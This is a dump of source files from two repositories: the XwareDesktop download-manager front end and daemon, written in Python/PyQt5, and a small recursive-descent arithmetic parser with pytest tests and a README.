misc.decodePrivateLink(taskUrl)\n return CreateTask(url)\n\n elif parsed.scheme == \"\":\n if parsed.path.endswith(\".torrent\"):\n return CreateTask(taskUrl, kind = CreateTask.LOCAL_TORRENT)\n\n elif parsed.scheme in (\"http\", \"https\", \"ftp\", \"magnet\", \"ed2k\"):\n return CreateTask(taskUrl)\n"
},
{
"alpha_fraction": 0.5785833597183228,
"alphanum_fraction": 0.5820415019989014,
"avg_line_length": 33.228572845458984,
"blob_id": "34e99b7315d4ad7cf7fcd4c89348996ff10ac1cf",
"content_id": "99966be937120bde14344aa06600984330ee9090",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8532,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 245,
"path": "/src/daemon/xwared.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport logging\n\nimport sys, os, time, fcntl, signal, threading\nimport collections\nfrom multiprocessing.connection import Listener\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../\"))\n\nimport pyinotify\n\nfrom shared import constants, BackendInfo\nfrom shared.misc import debounce, tryRemove, tryClose\nfrom shared.profile import profileBootstrap\nfrom settings import SettingsAccessorBase, XWARED_DEFAULTS_SETTINGS\n\n\nclass XwaredCommunicationListener(threading.Thread):\n def __init__(self, _xwared):\n super().__init__(daemon = True,\n name = \"xwared communication listener\")\n self._xwared = _xwared\n\n def run(self):\n with Listener(*constants.XWARED_SOCKET) as listener:\n while True:\n with listener.accept() as conn:\n func, args, kwargs = conn.recv()\n response = getattr(self._xwared, \"interface_\" + func)(*args, **kwargs)\n conn.send(response)\n\n\nclass Xwared(object):\n etmPid = 0\n fdLock = None\n toRunETM = None\n etmStartedAt = None\n etmLongevities = None\n\n # Cfg watchers\n etmCfg = dict()\n watchManager = None\n cfgWatcher = None\n\n def __init__(self):\n super().__init__()\n # requirements checking\n self.ensureNonRoot()\n self.ensureOneInstance()\n\n profileBootstrap(constants.PROFILE_DIR)\n tryRemove(constants.XWARED_SOCKET[0])\n\n # initialize variables\n signal.signal(signal.SIGTERM, self.unload)\n signal.signal(signal.SIGINT, self.unload)\n self.settings = SettingsAccessorBase(constants.XWARED_CONFIG_FILE,\n XWARED_DEFAULTS_SETTINGS)\n self.toRunETM = self.settings.getbool(\"xwared\", \"startetm\")\n self._resetEtmLongevities()\n\n # ipc listener\n self.listener = XwaredCommunicationListener(self)\n self.listener.start()\n\n # using pyinotify to monitor etm.cfg changes\n self.setupCfgWatcher()\n\n def setupCfgWatcher(self):\n # etm.cfg watcher\n self.watchManager = pyinotify.WatchManager()\n self.cfgWatcher = pyinotify.ThreadedNotifier(self.watchManager,\n self.pyinotifyDispatcher)\n self.cfgWatcher.name = \"cfgWatcher inotifier\"\n self.cfgWatcher.daemon = True\n self.cfgWatcher.start()\n self.watchManager.add_watch(constants.ETM_CFG_DIR, pyinotify.ALL_EVENTS)\n\n @debounce(0.5, instant_first=True)\n def onEtmCfgChanged(self):\n try:\n with open(constants.ETM_CFG_FILE, 'r') as file:\n lines = file.readlines()\n\n pairs = {}\n for line in lines:\n eq = line.index(\"=\")\n k = line[:eq]\n v = line[(eq + 1):].strip()\n pairs[k] = v\n self.etmCfg = pairs\n except FileNotFoundError:\n print(\"Xware Desktop: etm.cfg not present at the moment.\")\n\n def pyinotifyDispatcher(self, event):\n if event.maskname != \"IN_CLOSE_WRITE\":\n return\n\n if event.pathname == constants.ETM_CFG_FILE:\n self.onEtmCfgChanged()\n\n @staticmethod\n def ensureNonRoot():\n if os.getuid() == 0 or os.geteuid() == 0:\n print(\"拒绝以root运行\", file = sys.stderr)\n sys.exit(-1)\n\n def ensureOneInstance(self):\n # If one instance is already running, shout so and then exit the program\n # otherwise, a) hold the lock to xwared, b) prepare etm lock\n self.fdLock = os.open(constants.XWARED_LOCK, os.O_CREAT | os.O_RDWR)\n try:\n fcntl.flock(self.fdLock, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except BlockingIOError:\n print(\"xwared已经运行\", file = sys.stderr)\n sys.exit(-1)\n\n print(\"xwared: unlocked\")\n\n def runETM(self):\n while not self.toRunETM:\n time.sleep(1)\n\n if self.settings.getint(\"xwared\", \"startetmwhen\") == 2:\n self.settings.setbool(\"xwared\", \"startetm\", True)\n self.settings.save()\n\n self.toRunETM = True\n try:\n self.etmPid = os.fork()\n except OSError:\n print(\"Fork failed\", file = sys.stderr)\n sys.exit(-1)\n\n if self.etmPid == 0:\n # child\n os.putenv(\"CHMNS_LD_PRELOAD\", constants.ETM_PATCH_FILE)\n print(\"child: pid({pid}) ppid({ppid})\".format(pid = os.getpid(),\n ppid = self.etmPid))\n cmd = constants.ETM_COMMANDLINE\n os.execv(cmd[0], cmd)\n sys.exit(-1)\n else:\n # parent\n self.etmStartedAt = time.monotonic()\n print(\"parent: pid({pid}) cpid({cpid})\".format(pid = os.getpid(),\n cpid = self.etmPid))\n self._watchETM()\n\n def _resetEtmLongevities(self):\n sampleNumber = self.settings.getint(\"etm\", \"samplenumberoflongevity\")\n if not isinstance(self.etmLongevities, collections.deque):\n self.etmLongevities = collections.deque(maxlen = sampleNumber)\n\n for i in range(sampleNumber):\n self.etmLongevities.append(float(\"inf\"))\n\n def _watchETM(self):\n os.waitpid(self.etmPid, 0)\n self.etmPid = 0\n\n longevity = time.monotonic() - self.etmStartedAt\n self.etmLongevities.append(longevity)\n threshold = self.settings.getint(\"etm\", \"shortlivedthreshold\")\n if all(map(lambda l: l <= threshold, self.etmLongevities)):\n print(\"xwared: ETM持续时间连续{number}次不超过{threshold}秒,终止执行ETM\"\n .format(number = self.etmLongevities.maxlen,\n threshold = threshold),\n file = sys.stderr)\n print(\"这极有可能是xware本身的bug引起的,更多信息请看 \"\n \"https://github.com/Xinkai/XwareDesktop/wiki/故障排查和意见反馈\"\n \"#etm持续时间连续3次不超过30秒终止执行etm的调试方法\", file = sys.stderr)\n self.toRunETM = False\n\n def stopETM(self, restart):\n if self.etmPid:\n self.toRunETM = restart\n os.kill(self.etmPid, signal.SIGTERM)\n else:\n print(\"ETM not running, ignore stopETM\")\n if self.settings.getint(\"xwared\", \"startetmwhen\") == 2:\n self.settings.setbool(\"xwared\", \"startetm\", restart)\n self.settings.save()\n\n # frontend end interfaces\n def interface_startETM(self):\n self._resetEtmLongevities()\n self.toRunETM = True\n\n def interface_stopETM(self):\n self._resetEtmLongevities()\n self.stopETM(False)\n\n def interface_restartETM(self):\n self._resetEtmLongevities()\n self.stopETM(True)\n\n def interface_start(self):\n if self.settings.getint(\"xwared\", \"startetmwhen\") == 3:\n self.interface_startETM()\n self.settings.setbool(\"xwared\", \"startetm\", True)\n self.settings.save()\n\n def interface_quit(self):\n if self.settings.getint(\"xwared\", \"startetmwhen\") == 3:\n self.stopETM(False)\n self.settings.setbool(\"xwared\", \"startetm\", True)\n self.settings.save()\n\n def interface_getStartEtmWhen(self):\n return self.settings.getint(\"xwared\", \"startetmwhen\")\n\n def interface_setStartEtmWhen(self, startetmwhen):\n self.settings.setint(\"xwared\", \"startetmwhen\", startetmwhen)\n if startetmwhen == 1:\n self.settings.setbool(\"xwared\", \"startetm\", True)\n self.settings.save()\n\n def interface_setMounts(self, mounts):\n raise NotImplementedError()\n\n def interface_getMounts(self):\n raise NotImplementedError()\n\n def interface_infoPoll(self):\n return BackendInfo(etmPid = self.etmPid,\n lcPort = int(self.etmCfg.get(\"local_control.listen_port\", 0)),\n userId = int(self.etmCfg.get(\"userid\", 0)),\n peerId = self.etmCfg.get(\"rc.peerid\", \"\"))\n\n def unload(self, sig, stackframe):\n print(\"unloading...\")\n self.stopETM(False)\n\n tryClose(self.fdLock)\n tryRemove(constants.XWARED_LOCK)\n self.settings.save()\n\n sys.exit(0)\n\nif __name__ == \"__main__\":\n xwared = Xwared()\n while True:\n xwared.runETM()\n"
},
{
"alpha_fraction": 0.6648589968681335,
"alphanum_fraction": 0.6670281887054443,
"avg_line_length": 27.8125,
"blob_id": "3b9108af15f10f04e0070572f1e4122532ea44a4",
"content_id": "796b509eeb8461a7667c55316b9ee95c1e82ea3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 32,
"path": "/src/frontend/models/AdapterManager.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom launcher import app\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtProperty\n\nfrom collections import OrderedDict\n\n\nclass AdapterManager(QObject):\n ulSpeedChanged = pyqtSignal()\n dlSpeedChanged = pyqtSignal()\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self._adapters = OrderedDict()\n\n @pyqtProperty(int, notify = ulSpeedChanged)\n def ulSpeed(self):\n return sum(map(lambda a: a.ulSpeed, self._adapters.values()))\n\n @pyqtProperty(int, notify = dlSpeedChanged)\n def dlSpeed(self):\n return sum(map(lambda a: a.dlSpeed, self._adapters.values()))\n\n def registerAdapter(self, adapter):\n ns = adapter.namespace\n assert ns not in self._adapters\n adapter.update.connect(app.taskModel.taskManager.updateMap)\n self._adapters[ns] = adapter\n\n def adapter(self, ns):\n return self._adapters[ns]\n"
},
{
"alpha_fraction": 0.6525285243988037,
"alphanum_fraction": 0.655791163444519,
"avg_line_length": 28.190475463867188,
"blob_id": "dd4a9f748fb034401aafaf5c974342db573f6ec7",
"content_id": "329e9d2180149d5e26cca286dfb19326192c3ed7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1226,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 42,
"path": "/src/frontend/systray.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSlot, QObject\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QSystemTrayIcon\n\nfrom contextmenu import ContextMenu\n\n\nclass Systray(QObject):\n trayIconMenu = None\n\n def __init__(self, parent):\n super().__init__(parent)\n\n self.trayIconMenu = ContextMenu(None)\n\n icon = QIcon.fromTheme(\"xware-desktop\")\n\n self.trayIcon = QSystemTrayIcon(self)\n self.trayIcon.setIcon(icon)\n self.trayIcon.setContextMenu(self.trayIconMenu)\n self.trayIcon.setVisible(True)\n\n self.trayIcon.activated.connect(self.slotSystrayActivated)\n\n @pyqtSlot(QSystemTrayIcon.ActivationReason)\n def slotSystrayActivated(self, reason):\n if reason == QSystemTrayIcon.Context: # right\n pass\n elif reason == QSystemTrayIcon.MiddleClick: # middle\n pass\n elif reason == QSystemTrayIcon.DoubleClick: # double click\n pass\n elif reason == QSystemTrayIcon.Trigger: # left\n if app.mainWin.isHidden() or app.mainWin.isMinimized():\n app.mainWin.restore()\n else:\n app.mainWin.minimize()\n"
},
{
"alpha_fraction": 0.6480018496513367,
"alphanum_fraction": 0.6500929594039917,
"avg_line_length": 30.647058486938477,
"blob_id": "685e7354991e162089ba4a3b7179ea44e2a788eb",
"content_id": "0010f7b4d779504f5ff8e08d8f3a520270756bf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4328,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 136,
"path": "/src/frontend/Schedule/__init__.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot\n\nfrom Schedule.SchedulerCountdown import CountdownMessageBox\nfrom Schedule.PowerAction import PowerActionManager, ACTION_NONE\n\nALL_TASKS_COMPLETED = 0\nSELECTED_TASKS_COMPLETED = 1\n\n\nclass Scheduler(QObject):\n # connects PowerActionManager and SchedulerWin, also does confirmation.\n\n sigSchedulerSummaryUpdated = pyqtSignal()\n sigActionConfirmed = pyqtSignal(bool)\n\n POSSIBLE_ACTWHENS = (\n (ALL_TASKS_COMPLETED, \"所有的\"),\n (SELECTED_TASKS_COMPLETED, \"选中的\"),\n )\n\n _actionId = None\n _actWhen = None\n _waitingTaskIds = None # user-selected tasks\n _stillWaitingTasksNumber = 0 # (computed) user-selected tasks - nolonger running tasks\n confirmDlg = None\n\n def __init__(self, parent):\n super().__init__(parent)\n self._waitingTaskIds = set()\n self.reset()\n\n self.powerActionManager = PowerActionManager(self)\n self.actions = self.powerActionManager.actions\n\n app.etmpy.runningTasksStat.sigTaskNolongerRunning.connect(self.slotMayAct)\n app.etmpy.runningTasksStat.sigTaskAdded.connect(self.slotMayAct)\n self.sigActionConfirmed[bool].connect(self.slotConfirmed)\n\n @property\n def actWhen(self):\n # tasks\n return self._actWhen\n\n @actWhen.setter\n def actWhen(self, value):\n raise NotImplementedError(\"use set method\")\n\n @property\n def waitingTaskIds(self):\n return self._waitingTaskIds\n\n @waitingTaskIds.setter\n def waitingTaskIds(self, value):\n raise NotImplementedError(\"use set method\")\n\n @property\n def actionId(self):\n return self._actionId\n\n @actionId.setter\n def actionId(self, value):\n raise NotImplementedError(\"use set method\")\n\n def getActionNameById(self, actionId):\n return self.powerActionManager.getActionById(actionId).displayName\n\n def getSummary(self):\n # return either True / False / str\n # True -> action undergoing, system shutting down\n # False -> scheduled to do nothing\n # str -> one sentence summary\n if self.actionId == ACTION_NONE:\n return False\n\n if self._stillWaitingTasksNumber:\n return \"{}个任务结束后{}\".format(\n self._stillWaitingTasksNumber,\n self.getActionNameById(self.actionId))\n else:\n return True\n\n @pyqtSlot(int)\n def slotMayAct(self):\n if self.actionId == ACTION_NONE:\n self.sigSchedulerSummaryUpdated.emit()\n logging.info(\"cancel schedule because action is none\")\n return\n\n runningTaskIds = app.etmpy.runningTasksStat.getTIDs()\n if self.actWhen == SELECTED_TASKS_COMPLETED:\n stillWaitingTaskIds = set(runningTaskIds) & self.waitingTaskIds\n self._stillWaitingTasksNumber = len(stillWaitingTaskIds)\n elif self.actWhen == ALL_TASKS_COMPLETED:\n self._stillWaitingTasksNumber = len(runningTaskIds)\n else:\n raise Exception(\"Unknown actWhen.\")\n\n if self._stillWaitingTasksNumber > 0:\n self.sigSchedulerSummaryUpdated.emit()\n logging.info(\"not take action because desired tasks are running.\")\n return\n\n self.confirmDlg = CountdownMessageBox(self.getActionNameById(self.actionId))\n self.confirmDlg.show()\n self.confirmDlg.activateWindow()\n self.confirmDlg.raise_()\n\n def set(self, actWhen, taskIds, actionId):\n if actWhen == SELECTED_TASKS_COMPLETED:\n self._actWhen, self._waitingTaskIds, self._actionId = actWhen, taskIds, actionId\n else:\n self._actWhen, self._actionId = actWhen, actionId\n\n self.slotMayAct()\n\n def reset(self):\n # Should be called when\n # 1. app starts up\n # 2. immediately before power-control commands are run\n # 3. action is canceled by user\n self.set(ALL_TASKS_COMPLETED, set(), ACTION_NONE)\n\n @pyqtSlot(int)\n def slotConfirmed(self, confirmed):\n del self.confirmDlg\n if confirmed:\n _actionId = self.actionId\n self.powerActionManager.act(_actionId)\n self.reset()\n else:\n self.reset()\n"
},
{
"alpha_fraction": 0.5723153352737427,
"alphanum_fraction": 0.5785226821899414,
"avg_line_length": 34.406593322753906,
"blob_id": "2ec719004609b05bbc256ef26df0cb1a77354a2f",
"content_id": "429c9fe39228ee1a33161c864e5ad908a414d95b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3222,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 91,
"path": "/src/frontend/monitor.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, Qt, QPoint\n\nimport threading, time\n\nfrom ui_monitor import MonitorWidget, Ui_MonitorWindow\nfrom PersistentGeometry import PersistentGeometry\nfrom contextmenu import ContextMenu\n\n\nclass MonitorWindow(MonitorWidget, Ui_MonitorWindow, PersistentGeometry):\n sigTaskUpdating = pyqtSignal(dict)\n\n _stat = None\n _thread = None\n _thread_should_stop = False\n\n TICKS_PER_TASK = 4\n TICK_INTERVAL = 0.5 # second(s)\n\n _contextMenu = None\n\n def __init__(self, parent = None):\n super().__init__(parent)\n self.setupUi(self)\n self.setStyleSheet(\"background-color: rgba(135, 206, 235, 0.8)\")\n self.setAttribute(Qt.WA_TranslucentBackground)\n self.setAttribute(Qt.WA_DeleteOnClose)\n\n app.settings.applySettings.connect(self._setMonitorFullSpeed)\n self._setMonitorFullSpeed()\n\n self._thread = threading.Thread(target = self.updateTaskThread,\n name = \"monitor task updating\",\n daemon = True)\n self._thread.start()\n self.preserveGeometry()\n\n self._contextMenu = ContextMenu(None)\n self.setContextMenuPolicy(Qt.CustomContextMenu)\n self.customContextMenuRequested.connect(self.showContextMenu)\n\n def updateTaskThread(self):\n while True:\n runningTaskIds = app.etmpy.runningTasksStat.getTIDs()\n if runningTaskIds:\n for tid in runningTaskIds:\n for i in range(self.TICKS_PER_TASK):\n task = app.etmpy.runningTasksStat.getTask(tid)\n\n time.sleep(self.TICK_INTERVAL)\n if self._thread_should_stop:\n return # end the thread\n\n logging.debug(\"updateSpeedsThread, deadlock incoming, maybe\")\n try:\n self.sigTaskUpdating.emit(task)\n except TypeError:\n # monitor closed\n return # end the thread\n\n # FIXME: move the sleep function ahead, before sigTaskUpdating.emit\n # it seems to make the deadlock go away.\n # time.sleep(self.TICK_INTERVAL)\n else:\n time.sleep(self.TICK_INTERVAL)\n if self._thread_should_stop:\n return # end the thread\n try:\n self.sigTaskUpdating.emit(dict())\n except TypeError:\n # monitor closed\n return # end the thread\n\n @pyqtSlot()\n def _setMonitorFullSpeed(self):\n fullSpeed = app.settings.getint(\"frontend\", \"monitorfullspeed\")\n logging.info(\"monitor full speed -> {}\".format(fullSpeed))\n self.graphicsView.FULLSPEED = 1024 * fullSpeed\n\n def closeEvent(self, qCloseEvent):\n self._thread_should_stop = True\n super().closeEvent(qCloseEvent)\n\n @pyqtSlot(QPoint)\n def showContextMenu(self, qPoint):\n self._contextMenu.exec(self.mapToGlobal(qPoint))\n"
},
{
"alpha_fraction": 0.5367819666862488,
"alphanum_fraction": 0.5394692420959473,
"avg_line_length": 32.449440002441406,
"blob_id": "7b0874ec03901028b24e1e3f352551f87cfe1712",
"content_id": "d2da8438dff381960512bf501313794cb31fd95b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3137,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 89,
"path": "/src/frontend/CrashReport/CrashReportApp.py",
"repo_name": "Benyjuice/XwareDesktop",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt5.Qt import pyqtSlot, QDesktopServices, QUrl\nfrom PyQt5.QtWidgets import QDialog, QApplication\nfrom ui_crashreport import Ui_Dialog\nimport os, sys, subprocess\nimport html\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../../\"))\ntry:\n from shared import __githash__\nexcept ImportError:\n __githash__ = None\nfrom __init__ import CrashReport\n\n\nclass CrashReportForm(QDialog, Ui_Dialog):\n def __init__(self, parent = None):\n super().__init__(parent)\n self.setupUi(self)\n\n self.pushButton_github.clicked.connect(self.reportToGithub)\n self.pushButton_close.clicked.connect(self.reportToNone)\n\n def setPayload(self, payload):\n if not __githash__:\n githash = \"开发版\"\n else:\n githash = __githash__\n\n self.textBrowser.setHtml(\n \"发行版: {lsb_release}<br />\"\n \"桌面环境: {xdg_current_desktop}/{desktop_session}<br />\"\n \"版本: {githash}<br /><br />\"\n \"<b style='color: orange'>补充描述计算机。</b><br />可留空。<br /><br />\"\n\n \"<b style='color: orange'>简述在什么情况下发生了这个问题。</b><br />可留空。<br /><br />\"\n\n \"======================== 报告 ========================<br />\"\n \"错误发生在{threadName}<br />\"\n \"```<pre style='color:grey; font-family: Arial;'>\"\n \"{traceback}\"\n \"</pre>```<br />\"\n \"======================== 结束 ========================<br />\"\n .format(lsb_release = self.lsb_release(),\n xdg_current_desktop = os.environ.get(\"XDG_CURRENT_DESKTOP\", \"未知\"),\n desktop_session = os.environ.get(\"DESKTOP_SESSION\", \"未知\"),\n githash = githash,\n threadName = payload[\"thread\"],\n traceback = html.escape(payload[\"traceback\"]))\n )\n\n @staticmethod\n def lsb_release():\n try:\n with subprocess.Popen([\"lsb_release\", \"-idrcs\"], stdout = subprocess.PIPE) as proc:\n return proc.stdout.read().decode(\"UTF-8\")\n except FileNotFoundError:\n return \"发行版类型及版本获取失败。\"\n\n @pyqtSlot()\n def reportToGithub(self):\n qurl = QUrl(\"http://github.com/Xinkai/XwareDesktop/issues/new\")\n QDesktopServices.openUrl(qurl)\n\n @pyqtSlot()\n def reportToNone(self):\n self.close()\n\n\nclass CrashReportApp(QApplication):\n def __init__(self, argv):\n super().__init__(argv)\n self.form = CrashReportForm()\n if len(argv) > 1:\n payload = CrashReport.decodePayload(argv[1])\n else:\n payload = {\n \"thread\": \"测试线程\",\n \"traceback\": \"\"\"Traceback (most recent call last):\n File \"<模拟崩溃报告>\", line 1, in <module>\nZeroDivisionError: division by zero\"\"\",\n }\n self.form.setPayload(payload)\n self.form.show()\n\nif __name__ == \"__main__\":\n app = CrashReportApp(sys.argv)\n sys.exit(app.exec())\n"
}
] | 33 |
aadibajpai/parser
|
https://github.com/aadibajpai/parser
|
4c306534326181b2062af3762e9fbb71ac59f145
|
02fe95b81b131b6bb74698f5b23ed6a0bdd05152
|
249b6d4684a6cef03d0c7ef740b7576049976f46
|
refs/heads/master
| 2023-08-11T02:13:49.206128 | 2021-10-14T20:10:39 | 2021-10-14T20:10:39 | 416,147,279 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.2612021863460541,
"alphanum_fraction": 0.35628414154052734,
"avg_line_length": 32.88888931274414,
"blob_id": "c6eb5044c81256d25b3828ce18910b6519d867ec",
"content_id": "6179c5e202a96cf44f6d80007fd6386343a25c49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 915,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 27,
"path": "/test_parser.py",
"repo_name": "aadibajpai/parser",
"src_encoding": "UTF-8",
"text": "import pytest\n\nfrom Parse import Parse\n\n# the expression and the expected tree for it\n# easier to test than valid assembly that depends on this anyway\nexpr_trees = [\n (\"12\", 12),\n (\"(12)\", 12),\n (\"3 + 4 * 2\", (3, \"+\", (4, \"*\", 2))),\n (\"3 * 4 + 2\", ((3, \"*\", 4), \"+\", 2)),\n (\"(3 + 4) * 2\", ((3, \"+\", 4), \"*\", 2)),\n (\"(((3 + 4) * 2 + 4))\", (((3, \"+\", 4), \"*\", 2), \"+\", 4)),\n (\"(12 * 2) + ((2 + 4) * 3)) * (((3 * 2) + 4))\", None),\n (\"2 + ((3 (((5 + 7) * 2)) + 17 * 3) + 1) * 3\", None),\n (\"(((((2 * 3) + 1) )))\", ((2, \"*\", 3), \"+\", 1)),\n (\n \"(( 3 * 32) + 1) * ((2 + 7 * 2) + ((4 * 3)))\",\n (((3, \"*\", 32), \"+\", 1), \"*\", ((2, \"+\", (7, \"*\", 2)), \"+\", (4, \"*\", 3))),\n ),\n (\"(12 * (2 + 4) * 3)\", (12, \"*\", ((2, \"+\", 4), \"*\", 3))),\n]\n\n\[email protected](\"input, expected\", expr_trees)\ndef test_parse_tree(input, expected):\n assert Parse(input).parser() == expected\n"
},
{
"alpha_fraction": 0.739130437374115,
"alphanum_fraction": 0.7739130258560181,
"avg_line_length": 27.5,
"blob_id": "cdde9d84e6ae9005d8edf71f6f8c1f394e153e09",
"content_id": "f95fc7e56256f70ebaabdb8df3733b9ab15adfb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 115,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 4,
"path": "/README.md",
"repo_name": "aadibajpai/parser",
"src_encoding": "UTF-8",
"text": "# parser\ncs 3252 extra credit parser\n\nthe github workflow runs all the inputs in `inputs.txt` against the parser. \n"
},
{
"alpha_fraction": 0.5434988737106323,
"alphanum_fraction": 0.5482442378997803,
"avg_line_length": 19.52597427368164,
"blob_id": "15db720e6c2f6542f4b452f775ad1f108661d97f",
"content_id": "61c572a80db1ff5b6a29a9a4a5217fe0e7affaf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3167,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 154,
"path": "/parser.py",
"repo_name": "aadibajpai/parser",
"src_encoding": "UTF-8",
"text": "import re\n\n# use a global variable which isn't ideal\n# but I wanted to avoid all the boilerplate that comes with a class\n# since we primarily care about the logic\nexpr = input(\"enter the expression or q to exit: \")\n\n# match numbers\nNUM = re.compile(r\"(?P<NUM>\\d+)\")\n\n\ndef generate(expr):\n \"\"\"\n generate assembly code for an expression\n traverses the parse \"tree\" recursively\n e.g. for (12 * (2 + 4) * 3), the tree looks like\n (12, '*', ((2, '+', 4), '*', 3))\n \"\"\"\n # check for int and string since python doesn't have pattern matching\n if isinstance(expr, int):\n print(f\".load {expr}\")\n return\n\n elif isinstance(expr, str):\n print(\".mult\" if expr == \"*\" else \".add\")\n return\n\n # if we're here then we have a triplet\n left, middle, right = expr\n\n # post order traversal\n generate(left)\n generate(right)\n generate(middle)\n\n\ndef parser():\n \"\"\"\n the actual parsing function,\n processes the expression and handles getting the next expression\n \"\"\"\n global expr\n\n while expr != \"q\":\n print(f\"expression: {expr}\")\n expr = expr.replace(\" \", \"\") # strip whitespace\n\n try:\n ex = e() # call e since it's the first production rule\n\n # valid iff no error and all of expression consumed\n print(\"valid\" if not expr else f\"invalid, {expr=}\")\n print(f\"parse tree: {ex}\") # the generated tree\n print()\n\n generate(ex)\n\n except (IndexError, ValueError):\n # handle invalid expressions\n print(\"invalid\")\n\n print()\n expr = input(\"enter your expression or q to exit: \")\n print()\n\n\ndef advance(offset=1):\n \"\"\"\n consumes string based on the rule applied\n \"\"\"\n global expr\n expr = expr[offset:]\n\n\ndef e():\n \"\"\"\n E → P + E | P\n \"\"\"\n prod = p()\n\n # need to check to verify if it is P + E\n if expr and expr[0] == \"+\":\n match(\"+\")\n ex = e()\n # we return tuples to represent a node and its left and right nodes\n # since then we can apply tuple unpacking to neatly process the tree\n return (prod, \"+\", ex)\n\n return prod\n\n\ndef p():\n \"\"\"\n P → T * P | T\n \"\"\"\n term = t()\n\n if expr and expr[0] == \"*\":\n match(\"*\")\n prod = p()\n return (term, \"*\", prod)\n\n return term\n\n\ndef t():\n \"\"\"\n T → Num | (E)\n \"\"\"\n if expr[0] == \"(\":\n match(\"(\")\n ex = e()\n match(\")\")\n\n return ex\n\n # numbers are the leafs of our tree\n # so we just keep them as ints and not tuples\n return read_number()\n\n\ndef match(symbol):\n \"\"\"\n match provided symbol to the next element in expression\n \"\"\"\n next = expr[0]\n advance()\n\n if next != symbol:\n raise ValueError\n\n\ndef read_number():\n \"\"\"\n read a number from the expression\n \"\"\"\n if not expr:\n return\n\n match = NUM.match(expr)\n\n if not match:\n raise ValueError\n\n # get the actual number from the match object\n number = match.group(\"NUM\")\n\n advance(len(number))\n\n return int(number)\n\n\nif __name__ == \"__main__\":\n parser()\n"
},
{
"alpha_fraction": 0.49413490295410156,
"alphanum_fraction": 0.4985337257385254,
"avg_line_length": 23.184396743774414,
"blob_id": "12554586b38f96a7969dd7ad7fb97ecc21e42e68",
"content_id": "5187cd83c072c43688f24dd1637043b6671e931f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3416,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 141,
"path": "/Parse.py",
"repo_name": "aadibajpai/parser",
"src_encoding": "UTF-8",
"text": "import re\n\n# match numbers\nNUM = re.compile(r\"(?P<NUM>\\d+)\")\n\n\nclass Parse:\n def __init__(self, expr):\n self.expr = expr\n\n @classmethod\n def generate(self, node):\n \"\"\"\n generate assembly code for an expression\n traverses the parse \"tree\" recursively\n e.g. for (12 * (2 + 4) * 3), the tree looks like\n (12, '*', ((2, '+', 4), '*', 3))\n \"\"\"\n # invalid expression\n if not node:\n return\n\n # check for int and string since python doesn't have pattern matching\n if isinstance(node, int):\n print(f\".load {node}\")\n return\n\n elif isinstance(node, str):\n print(\".mult\" if node == \"*\" else \".add\")\n return\n\n # if we're here then we have a triplet\n left, middle, right = node\n\n # post order traversal\n self.generate(left)\n self.generate(right)\n self.generate(middle)\n\n def parser(self):\n \"\"\"\n the actual parsing function,\n processes the expression and handles getting the next expression\n \"\"\"\n self.expr = self.expr.replace(\" \", \"\") # strip whitespace\n\n try:\n ex = self.e() # call e since it's the first production rule\n\n # valid iff no error and all of expression consumed\n if self.expr:\n return None\n\n return ex\n\n except (IndexError, ValueError):\n # handle invalid expressions\n return None\n\n def advance(self, offset=1):\n \"\"\"\n consumes string based on the rule applied\n \"\"\"\n self.expr = self.expr[offset:]\n\n def e(self):\n \"\"\"\n E → P + E | P\n \"\"\"\n prod = self.p()\n\n # need to check to verify if it is P + E\n if self.expr and self.expr[0] == \"+\":\n self.match(\"+\")\n ex = self.e()\n # we return tuples to represent a node and its left and right nodes\n # since then we can apply tuple unpacking to neatly process the tree\n return (prod, \"+\", ex)\n\n return prod\n\n def p(self):\n \"\"\"\n P → T * P | T\n \"\"\"\n term = self.t()\n\n if self.expr and self.expr[0] == \"*\":\n self.match(\"*\")\n prod = self.p()\n return 